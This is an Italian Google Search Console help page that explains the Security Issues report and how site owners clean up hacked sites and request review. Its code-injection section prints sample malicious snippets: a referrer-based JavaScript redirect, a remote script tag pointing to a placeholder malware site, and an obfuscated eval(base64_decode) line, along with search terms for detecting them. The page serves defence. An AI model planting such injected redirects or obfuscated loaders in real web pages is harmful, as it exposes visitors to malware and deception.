Rapporto Problemi di sicurezza

Se una valutazione di Google determina che il tuo sito è stato violato o che presenta un comportamento potenzialmente dannoso per i visitatori o i loro computer, il rapporto Problemi di sicurezza mostrerà i risultati raccolti da Google. Esempi di comportamenti dannosi includono attacchi di phishing o l'installazione di malware o software indesiderato sul computer degli utenti.

Pagine o siti interessati da un problema di sicurezza potrebbero essere visualizzati con un'etichetta di avviso nei risultati di ricerca oppure con una pagina di avviso interstitial nel browser quando un utente prova a visitarli.

Apri il rapporto Problemi di sicurezza

 

Security issues report in Search Console - Google Search Console Training

Cosa si intende per problemi di sicurezza?

I problemi di sicurezza qui riportati rientrano nelle seguenti categorie:

  • Contenuti compromessi: contenuti inseriti nel tuo sito senza la tua autorizzazione a causa di vulnerabilità nella sicurezza del sito. Per proteggere i suoi utenti, Google fa del suo meglio per escludere i contenuti compromessi dai suoi risultati di ricerca. Ulteriori informazioni.
  • Malware e software indesiderato: si tratta di un software progettato per danneggiare un dispositivo o i suoi utenti, che adotta pratiche ingannevoli o inattese o che influisce negativamente sull'utente. Il malware può essere installato da un hacker o dal proprietario del sito. Ulteriori informazioni.
  • Ingegneria sociale: contenuti che inducono con l'inganno i visitatori a fare qualcosa di pericoloso, ad esempio rivelare informazioni riservate o scaricare software. Ulteriori informazioni.

Ci sono problemi di sicurezza per il mio sito?

Nella parte superiore del rapporto vedrai indicato il numero dei problemi di sicurezza riscontrati sul tuo sito.

Se non sono presenti problemi di sicurezza, vedrai un segno di spunta verde e un messaggio.

Sito acquistato recentemente

Se di recente hai acquistato un sito che presentava problemi di sicurezza preesistenti, correggi i problemi elencati nel rapporto Problemi di sicurezza quindi, nella richiesta di riconsiderazione, comunicaci che hai recentemente acquistato il sito e che ora è conforme alle Istruzioni per i webmaster di Google.

Quali sono le pagine interessate?

Espandi la descrizione di un problema per visualizzare un elenco di esempi di URL interessati. Questo elenco, non necessariamente completo, riporta un campione di pagine del tuo sito interessate da quel problema. Talvolta potrebbe essere segnalato un problema di sicurezza senza URL di esempio; questo non significa che nessuna pagina sia interessata, ma che, per qualche motivo, non siamo riusciti a generare campioni.

I dettagli del problema mostrano la data in cui il problema è stato rilevato per la prima volta sul tuo sito, oltre a una breve descrizione e un link per ulteriori informazioni al riguardo.

Risolvere il problema

Per risolvere un problema di sicurezza sul tuo sito:

  1. Espandi la descrizione del problema nel rapporto Problemi di sicurezza.
  2. Leggi la descrizione del problema e segui il relativo link "Ulteriori informazioni" per consultare informazioni dettagliate e i passaggi per risolvere il problema. I link per ulteriori informazioni rimandano alle descrizioni in fondo a questa pagina.
  3. Utilizza il campione di pagine interessate fornito nella sezione dei dettagli per risolvere e correggere il problema. Questo elenco, non necessariamente completo, riporta un campione di pagine del tuo sito interessate dal problema. Potrebbe anche essere segnalato un problema di sicurezza senza URL di esempio; questo non significa che nessuna pagina sia interessata, ma che, per qualche motivo, non siamo riusciti a generare campioni.
  4. Risolvi il problema in tutte le pagine del sito. Risolvere il problema solo in alcune pagine non ti garantirà una reintegrazione parziale nei risultati di ricerca.
  5. Se il rapporto elenca più problemi di sicurezza che interessano il tuo sito, correggili tutti.
  6. Testa le tue correzioni.
  7. Quando tutti i problemi elencati nel rapporto saranno corretti in tutte le pagine, seleziona Richiedi esame nel rapporto Problemi di sicurezza. Nella richiesta di riconsiderazione, descrivi le correzioni introdotte. Per essere valida, una richiesta deve soddisfare i tre criteri seguenti:
    • Spiegare con precisione il problema di qualità del sito.
    • Descrivere la procedura eseguita per risolvere il problema.
    • Documentare il risultato delle contromisure adottate.
  8. L'esame di riconsiderazione può richiedere una settimana o due. Riceverai informazioni sullo stato della richiesta via email. Quando invii una richiesta, riceverai un messaggio che conferma l'esame in corso; aspetta di ricevere una decisione finale per la richiesta prima di inviarla di nuovo.

Quanto dura l'esame per la riconsiderazione?

Fino a una o due settimane. Verrai informato via email dell'avvenuta ricezione e attivazione della richiesta. Riceverai un'email anche quando l'esame sarà completato.

Aspetta di ricevere una decisione per la richiesta attiva prima di inviarla nuovamente. L'invio di una richiesta di riconsiderazione quando il problema non è stato risolto può causare tempi di risposta più lunghi per la richiesta successiva. Il richiedente potrebbe inoltre essere contrassegnato come trasgressore recidivo.

Elenco dei problemi di sicurezza

Ecco un elenco dei possibili problemi di sicurezza, con le relative informazioni su come risolverli. I problemi sono classificati come errori  o avvisi .

Spiegazione dei problemi di sicurezza - Formazione su Google Search Console

Compromissione: malware
Il tuo sito è stato infettato oppure ospita malware di un hacker malintenzionato. Il malware è un software o un'applicazione per dispositivi mobili pensato appositamente per danneggiare un computer, un dispositivo mobile, il software in esecuzione o gli utenti. Leggi ulteriori informazioni sul malware.

1. Conferma il problema

Visita alcuni degli URL di esempio in un browser Chrome. È probabile che sulla barra di navigazione del browser venga visualizzato un avviso Pericolosa e una pagina interstitial di avviso simile alla seguente:

2. Determina se puoi risolvere il problema

Per risolvere un problema di malware sul tuo sito, è necessario saper leggere e comprendere il codice ed eventualmente le configurazioni dei server web per il tuo sito. Se pensi che il problema vada oltre le tue competenze, leggi Formare un team di assistenza per scoprire come trovare qualcuno che ti aiuti a risolvere il problema.

3. Diagnostica e correggi il problema di malware

Leggi la sezione dedicata alla correzione del malware della Guida per i siti compromessi su web.dev per apprendere come identificare il tipo di malware e risolvere il problema. Tieni presente che il tuo sito potrebbe essere infetto da più tipi di malware, perciò esegui accuratamente la diagnosi e la pulizia del sito. Conferma la presenza del problema in uno degli URL di esempio mostrati nel rapporto Problemi di sicurezza.

4. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

5. Segui le best practice per mantenere il tuo sito sicuro

Leggi queste linee guida su come evitare che il tuo sito venga compromesso e come monitorarne la sicurezza.

Compromissione: iniezione di codice

Un hacker ha compromesso il tuo sito e inietta codice dannoso nelle tue pagine. Gli esempi includono reindirizzamenti a un sito dannoso o l'esecuzione di software di mining di criptovaluta nel browser mentre la pagina è aperta.

1. Determina se puoi risolvere il problema

Leggi l'articolo su come formare un team di assistenza per avere un'idea di cosa potrebbe servire per risolvere in autonomia questo problema o per sapere come trovare aiuto se pensi che il problema vada oltre le tue competenze.

2. Conferma il problema

Conferma la presenza del problema in uno degli URL di esempio forniti per questo avviso.

Evita di utilizzare un browser per visualizzare direttamente le pagine infette del tuo sito.

Poiché spesso il malware si diffonde sfruttando le vulnerabilità del browser, l'apertura di una pagina infetta da malware in un browser potrebbe danneggiare il computer. Inoltre, gli hacker potrebbero nascondere i contenuti con spam con tecniche di cloaking, al fine di evitarne il rilevamento da parte dei proprietari dei siti.

Di seguito sono riportati due metodi alternativi per visualizzare i contenuti in modo più sicuro sul tuo computer:

  • Utilizza lo strumento Controllo URL per visualizzare la tua pagina come la vede Google. Questa soluzione è utile in quanto molti hacker apportano modifiche visibili solo a Google. Ad esempio, potrebbero aggiungere link dal tuo sito ai loro siti che vengono mostrati solo quando il referrer è Google.
  • Utilizza cURL o Wget per eseguire richieste HTTP (ad esempio, il recupero di una pagina) dalla riga di comando. Questi strumenti disponibili gratuitamente sono utili nella diagnosi dei reindirizzamenti e sono in grado di specificare le informazioni sui referrer o sullo user-agent. Gli hacker spesso attaccano solo user-agent o referrer specifici per evitare di essere rilevati e poter selezionare target migliori. L'utilizzo di questi strumenti ti consente di simulare un target. Prova a utilizzare diversi indirizzi di referrer (ad esempio, link da grandi siti web o diversi motori di ricerca), se la richiesta non provoca la diffusione di spam. Ad esempio, per simulare un utente che segue un link dai risultati della Ricerca Google su www.example.com/page.html su un computer Windows, puoi utilizzare cURL così:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

L'hacker potrebbe avere iniettato il codice dannoso direttamente nei file HTML del sito (ad esempio, tramite l'aggiunta di un reindirizzamento JavaScript) oppure nei file che generano i contenuti del tuo sito (ad esempio, file PHP).

Recupera una pagina compromessa elencata nel rapporto ed esamina la risposta. Gli hacker possono utilizzare diverse tecniche per reindirizzare i visitatori dal tuo sito al loro; eccone alcuni:

  • Reindirizzamento:​
    • Reindirizzamenti intestazione: gli hacker possono reindirizzare i visitatori con la modifica dei file di configurazione del server. I file di configurazione del server solitamente consentono all'amministratore del sito di specificare i reindirizzamenti URL per pagine o directory specifiche su un sito web. Ad esempio, sui server Apache, questo è il file .htaccess o httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Reindirizzamenti JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • JavaScript dannoso caricato da un altro sito:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Codice dannoso offuscato per evitarne il rilevamento:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Cerca il codice sospetto nelle risposte e sul tuo sito. Termini di ricerca utili includono "search", "eval", "base64_decode" e "unescape".

3. Ripulisci il sito

Quando tutto è pronto per ripulire il tuo sito, puoi sostituire i file interessati con l'ultimo backup valido oppure puoi rimuovere in autonomia i contenuti contenenti spam.

Inoltre:

4. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Compromissione: iniezione di contenuti

Un hacker ha aggiunto link o testo contenente spam alle pagine del tuo sito. Il contenuto iniettato può contenere termini farmaceutici o altro spam non correlato ai contenuti del sito.

In genere, gli hacker modificano il tuo sito in uno dei seguenti modi:

  • Acquisendo l'accesso a una directory non sicura sul server. Ad esempio, potresti avere inavvertitamente lasciato una directory con autorizzazioni aperte.
  • Sfruttando una vulnerabilità nel software in esecuzione sul tuo sito, come ad esempio un sistema di gestione dei contenuti. Ad esempio, potresti avere una versione meno recente e meno sicura di Drupal, Joomla! o WordPress.
  • Compromettendo plug-in di terze parti che utilizzi nel tuo sito come, ad esempio, contatori di visitatori.

1. Determina se puoi risolvere il problema

Leggi l'articolo su come formare un team di assistenza per avere un'idea di cosa potrebbe servire per risolvere in autonomia questo problema o per sapere come trovare aiuto se pensi che il problema vada oltre le tue competenze.

2. Conferma il problema

Conferma la presenza del problema in uno degli URL di esempio forniti per questo avviso.

Evita di utilizzare un browser per visualizzare direttamente le pagine infette del tuo sito.

Poiché spesso il malware si diffonde sfruttando le vulnerabilità del browser, l'apertura di una pagina infetta da malware in un browser potrebbe danneggiare il computer. Inoltre, gli hacker potrebbero nascondere i contenuti con spam con tecniche di cloaking, al fine di evitarne il rilevamento da parte dei proprietari dei siti.

Di seguito sono riportati due metodi alternativi per visualizzare i contenuti in modo più sicuro sul tuo computer:

  • Utilizza lo strumento Controllo URL per visualizzare la tua pagina come la vede Google. Questa soluzione è utile in quanto molti hacker apportano modifiche visibili solo a Google. Ad esempio, potrebbero aggiungere link dal tuo sito ai loro siti che vengono mostrati solo quando il referrer è Google.
  • Utilizza cURL o Wget per eseguire richieste HTTP (ad esempio, il recupero di una pagina) dalla riga di comando. Questi strumenti disponibili gratuitamente sono utili nella diagnosi dei reindirizzamenti e sono in grado di specificare le informazioni sui referrer o sullo user-agent. Gli hacker spesso attaccano solo user-agent o referrer specifici per evitare di essere rilevati e poter selezionare target migliori. L'utilizzo di questi strumenti ti consente di simulare un target. Prova a utilizzare diversi indirizzi di referrer (ad esempio, link da grandi siti web o diversi motori di ricerca), se la richiesta non provoca la diffusione di spam. Ad esempio, per simulare un utente che segue un link dai risultati della Ricerca Google su www.example.com/page.html su un computer Windows, puoi utilizzare cURL così:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Recupera alcune pagine nel tuo sito e cerca nelle risposte contenuti sospetti o link che non hai aggiunto. Ad esempio, cerca termini farmaceutici o collegati a spam come "viagra" o "guadagna denaro".

3. Ripulisci il sito

Quando tutto è pronto per ripulire il tuo sito, puoi sostituire i file interessati con l'ultimo backup valido oppure puoi rimuovere il contenuto e i link contenenti spam da ogni pagina. Assicurati di correggere tutti gli esempi di compromissione mostrati nel rapporto Problemi di sicurezza. Inoltre, cerca altre pagine del tuo sito che potrebbero essere state compromesse usando il parametro di ricerca "site:" su Google ed effettuando una ricerca nei file di origine sul tuo sito web.

Inoltre:

4. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Compromissione: iniezione di URL

Un hacker ha creato nuove pagine sul tuo sito, che tipicamente includono parole o link contenenti spam. A volte queste nuove pagine contengono codice che esegue operazioni non previste come, ad esempio, reindirizzare gli utenti verso altri siti o fare in modo che il tuo server web partecipi a un attacco denial of service contro altri siti.

1. Determina se puoi risolvere il problema

Leggi l'articolo su come formare un team di assistenza per avere un'idea di cosa potrebbe servire per risolvere in autonomia questo problema o per sapere come trovare aiuto se pensi che il problema vada oltre le tue competenze.

2. Conferma il problema

Conferma la presenza del problema in uno degli URL di esempio forniti per questo avviso.

Evita di utilizzare un browser per visualizzare direttamente le pagine infette del tuo sito.

Poiché spesso il malware si diffonde sfruttando le vulnerabilità del browser, l'apertura di una pagina infetta da malware in un browser potrebbe danneggiare il computer. Inoltre, gli hacker potrebbero nascondere i contenuti con spam con tecniche di cloaking, al fine di evitarne il rilevamento da parte dei proprietari dei siti.

Di seguito sono riportati due metodi alternativi per visualizzare i contenuti in modo più sicuro sul tuo computer:

  • Utilizza lo strumento Controllo URL per visualizzare la tua pagina come la vede Google. Questa soluzione è utile in quanto molti hacker apportano modifiche visibili solo a Google. Ad esempio, potrebbero aggiungere link dal tuo sito ai loro siti che vengono mostrati solo quando il referrer è Google.
  • Utilizza cURL o Wget per eseguire richieste HTTP (ad esempio, il recupero di una pagina) dalla riga di comando. Questi strumenti disponibili gratuitamente sono utili nella diagnosi dei reindirizzamenti e sono in grado di specificare le informazioni sui referrer o sullo user-agent. Gli hacker spesso attaccano solo user-agent o referrer specifici per evitare di essere rilevati e poter selezionare target migliori. L'utilizzo di questi strumenti ti consente di simulare un target. Prova a utilizzare diversi indirizzi di referrer (ad esempio, link da grandi siti web o diversi motori di ricerca), se la richiesta non provoca la diffusione di spam. Ad esempio, per simulare un utente che segue un link dai risultati della Ricerca Google su www.example.com/page.html su un computer Windows, puoi utilizzare cURL così:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Esegui una query sugli URL di esempio elencati nel rapporto per vedere se sono attivi. Probabilmente queste pagine non saranno state create da te, quindi dovrai rimuoverle dal tuo sito o eliminare il codice che le genera automaticamente. Leggi come trovare ed eliminare queste pagine dal tuo sito.

Puoi anche fare una ricerca con "site:" per trovare le pagine non create da te.

  • Su un sito di piccole dimensioni, puoi cercare [site:example.com] in Ricerca Google per visualizzare un elenco di pagine che abbiamo indicizzato, per verificare la presenza di pagine non create da te.
  • Per i siti più grandi, puoi utilizzare una query più specifica, ad esempio:
    • [site:example.com pharmacy] elenca tutte le pagine contenenti la parola "pharmacy" su example.com. Puoi utilizzare altri termini di spam comuni.
    • [site:example.com/wp-admin/] elenca tutte le pagine nella sezione di amministrazione del tuo sito WordPress.

3. Ripulisci il sito

Quando tutto è pronto per ripulire il tuo sito, puoi sostituire le directory interessate con l'ultimo backup valido oppure rimuovere le pagine indesiderate ed eventuali file o funzioni utilizzati dall'hacker per crearle.

Inoltre:

4. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Pagine ingannevoli

Il tuo sito include contenuti che inducono con l'inganno i visitatori a fare qualcosa di pericoloso, ad esempio rivelare informazioni riservate o scaricare software. La funzione Google Navigazione sicura protegge gli utenti del Web tramite un avviso prima che visitino pagine in cui vengono regolarmente visualizzati contenuti ingannevoli.

Le pagine web sono considerate ingannevoli quando:

  • Fingono di essere entità attendibili, ad esempio il tuo dispositivo o browser oppure lo stesso sito web; oppure
  • Tentano di indurti con l'inganno a compiere un'azione che svolgeresti solo per un'entità attendibile, ad esempio condividere una password, chiamare un numero di assistenza tecnica o scaricare software.

Questo tipo di contenuti ingannevoli viene chiamato ingegneria socialeLeggi ulteriori informazioni sull'ingegneria sociale oppure vedi alcuni esempi di pagine ingannevoli.

Risolvere il problema

1. Conferma il problema

Visita le pagine di esempio per cercare i contenuti ingannevoli. Puoi utilizzare lo strumento Controllo URL per visualizzare il tuo sito sia per dispositivi mobili che per desktop.

2. Correggi le tue pagine

Correggi eventuali pagine con contenuti di ingegneria sociale. Se ritieni che la funzione Navigazione sicura abbia classificato una pagina web in modo erroneo, segnalalo qui.

3. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Risorse incorporate ingannevoli

Il tuo sito include pubblicità ingannevoli o risorse incorporate che inducono con l'inganno i visitatori a fare qualcosa di pericoloso, ad esempio rivelare informazioni riservate o scaricare software indesiderato. I contenuti ingannevoli potrebbero essere inclusi tramite risorse incorporate nelle pagine, ad esempio immagini, componenti di terze parti o annunci. La funzione Google Navigazione sicura protegge gli utenti del Web tramite un avviso prima che visitino pagine in cui vengono regolarmente visualizzati contenuti ingannevoli.

A volte questi contenuti sono visibili agli utenti nella pagina host; in altri casi il sito host non contiene annunci visibili ma, tramite popup, pop-under o altri tipi di reindirizzamento, reindirizza gli utenti a pagine non valide. In tutti i casi, questo tipo di contenuti incorporati comporterà una violazione delle norme per la pagina host.

Questo tipo di contenuti ingannevoli viene chiamato ingegneria socialeLeggi ulteriori informazioni sull'ingegneria sociale oppure vedi esempi di risorse incorporate ingannevoli.

Risolvere il problema

1. Conferma il problema

Visita le pagine di esempio per cercare i contenuti ingannevoli. Verifica che nessun annuncio, immagine o altra risorsa di terze parti incorporata nelle pagine del tuo sito sia ingannevole. Tieni presente che le reti pubblicitarie potrebbero far ruotare gli annunci mostrati nelle pagine del tuo sito. Potresti, quindi, dover aggiornare alcune volte una pagina per visualizzare eventuali annunci di ingegneria sociale. Alcuni annunci potrebbero avere un aspetto diverso sui dispositivi mobili e sui computer desktop. Puoi utilizzare lo strumento Controllo URL per visualizzare il tuo sito sia per dispositivi mobili che per desktop.

2. Rimuovi gli annunci o le risorse ingannevoli

Controlla le risorse di terze parti incluse nel tuo sito. Verifica che nessun annuncio, immagine o altra risorsa di terze parti incorporata nelle pagine del tuo sito sia ingannevole. Correggi eventuali pagine con contenuti di ingegneria sociale

3. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Download dannosi

Il tuo sito propone agli utenti un download che Google Navigazione sicura identifica come malware o software indesiderato. Il browser Chrome potrebbe mostrare un avviso agli utenti quando visitano il tuo sito. Per rimuovere l'avviso, devi rimuovere questi download dal tuo sito.

1. Conferma il problema

Visualizza alcune delle pagine di esempio sul tuo sito per confermare la presenza di questi download.

2. Valuta il problema

  • Se questi download sono intenzionali, rimuovili dal tuo sito e vai direttamente a Richiedi un esame.
  • Se non sei a conoscenza di download sul tuo sito, è possibile che il sito sia stato compromesso. Dovresti correggere il tuo sito compromesso, quindi trovare e rimuovere i download.

3. Ripulisci il sito

Leggi la Guida per i siti compromessi per trovare un flusso di correzioni completo per il tuo sito, inclusi passaggi di pulizia e suggerimenti per evitare una nuova compromissione. Quando tutto è pronto per ripulire il tuo sito, puoi sostituire i file interessati con l'ultimo backup valido oppure puoi rimuovere in autonomia i contenuti contenenti spam. Utilizza un software antivirus per analizzare programmi binari e altri contenuti in hosting sul tuo sito. Il software antivirus individua molti tipi di malware e software indesiderato, ma non tutti purtroppo. Se effettui l'analisi del tuo software tramite un programma antivirus o un servizio per identificare i virus come VirusTotal, puoi avere un'idea dei potenziali problemi relativi. La funzione Google Navigazione sicura applica criteri propri per stabilire se un programma o un file binario costituisce software indesiderato oppure malware.

4. Conferma le correzioni

Assicurati che il tuo sito sia conforme alle Norme relative al software indesiderato.

5. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Link a download dannosi

Il tuo sito è collegato a siti che propongono download di malware o software indesiderato secondo Google Navigazione sicura. Il browser Chrome potrebbe mostrare un avviso agli utenti quando visitano il tuo sito. Per rimuovere l'avviso, devi rimuovere i collegamenti ai siti dannosi.

1. Conferma il problema

Visualizza alcune delle pagine di esempio sul tuo sito per confermare la presenza di questi download. In alcuni casi, gli hacker possono nascondere questi link se pensano che tu sia il proprietario del sito, quindi prova a visitare gli URL di esempio con lo strumento Controllo URL o accedi con un account diverso o da un altro computer.

2. Valuta il problema

Se questi link sono intenzionali, rimuovili dal tuo sito e vai direttamente a Richiedi un esame.

Se non sei a conoscenza di questi link, è possibile che il tuo sito sia stato violato.

3. Determina se puoi risolvere il problema

Se il tuo sito è stato compromesso, leggi l'articolo su come formare un team di assistenza per avere un'idea di cosa potrebbe servire per risolvere in autonomia questo problema o per sapere come trovare aiuto se pensi che il problema vada oltre le tue competenze.

4. Ripulisci il sito

Leggi la Guida per i siti compromessi per trovare un flusso di correzioni completo per il tuo sito, inclusi passaggi di pulizia e suggerimenti per evitare una nuova compromissione. Quando tutto è pronto per ripulire il tuo sito, puoi sostituire i file interessati con l'ultimo backup valido oppure puoi rimuovere in autonomia i contenuti contenenti spam.

5. Conferma le correzioni

Assicurati che il tuo sito sia conforme alle Norme relative al software indesiderato.

6. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Fatturazione con reti mobili non chiara

Google ha rilevato che il tuo sito non informa in modo adeguato gli utenti in merito agli addebiti per l'uso di reti mobili, perciò Chrome potrebbe mostrare un avviso prima del caricamento di una pagina che comporta addebiti.

1. Conferma il problema

Visita gli URL di esempio elencati nel rapporto per vedere quali pagine hanno un comportamento di fatturazione con reti mobili poco chiaro. Consulta qui le linee guida sulla fatturazione con reti mobili.

2. Risolvi il problema

Correggi le pagine in modo che siano conformi alle best practice di fatturazione con reti mobili.

3. Richiedi un esame

Quando confermi che il problema è stato risolto nel tuo sito, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana.

Download insoliti

Il tuo sito propone un download che Google Navigazione sicura non ha mai visto prima. Il browser Chrome potrebbe comunicare agli utenti, tramite avvisi, che si tratta di un download insolito e potrebbe essere pericoloso. Gli avvisi vengono rimossi automaticamente se la funzione Google Navigazione sicura verifica che si tratta di file innocui. Tieni presente che gli URL di esempio non vengono sempre forniti per questo problema.

Questo problema non impedisce la visualizzazione della tua pagina o del tuo sito nei risultati della Ricerca Google, ma mostra un avviso nel browser Chrome quando un utente richiede inizialmente di scaricare file sconosciuti.

1. Risolvi il problema

Trova i download e verifica che siano conformi alle linee guida relative ai download.

  • Se uno qualsiasi dei download sul tuo sito viola queste linee guida, rimuovilo.
  • Se un download non viola queste linee guida, non è necessario rimuoverlo.

2. Richiedi un esame

Quando hai finito di rimuovere i file o dopo aver verificato che i download sono conformi alle linee guida, richiedi un esame della sicurezza nel rapporto Problemi di sicurezza. L'esame può richiedere da alcuni giorni a qualche settimana. Anche senza una richiesta di esame, Google valuterà la maggior parte dei download e li classificherà come accettabili o dannosi. Tuttavia, l'invio di una richiesta di esame può velocizzare il processo di valutazione.

 

Differenze tra il rapporto Azioni manuali e il rapporto Problemi di sicurezza

Il rapporto Azioni manuali elenca i problemi in una pagina o un sito che sono principalmente tentativi di manipolazione del nostro indice di ricerca, ma che non sono necessariamente pericolosi per gli utenti. La maggior parte dei problemi segnalati qui comporta un peggioramento della posizione delle pagine o del sito nei risultati di ricerca oppure l'omissione dai risultati di ricerca, senza alcuna indicazione visiva per l'utente.

Nel rapporto Problemi di sicurezza sono presenti diverse indicazioni: vieni informato del fatto che il tuo sito è stato compromesso oppure ti viene indicato un comportamento del tuo sito che potrebbe danneggiare i visitatori o i loro computer, ad esempio tramite attacchi di phishing o l'installazione di malware o software indesiderato sul computer degli utenti. Queste pagine potrebbero essere visualizzate con un'etichetta di avviso nei risultati di ricerca oppure un browser potrebbe visualizzare una pagina di avviso interstitial quando un utente prova a visitarle.

È stato utile?
Come possiamo migliorare l'articolo?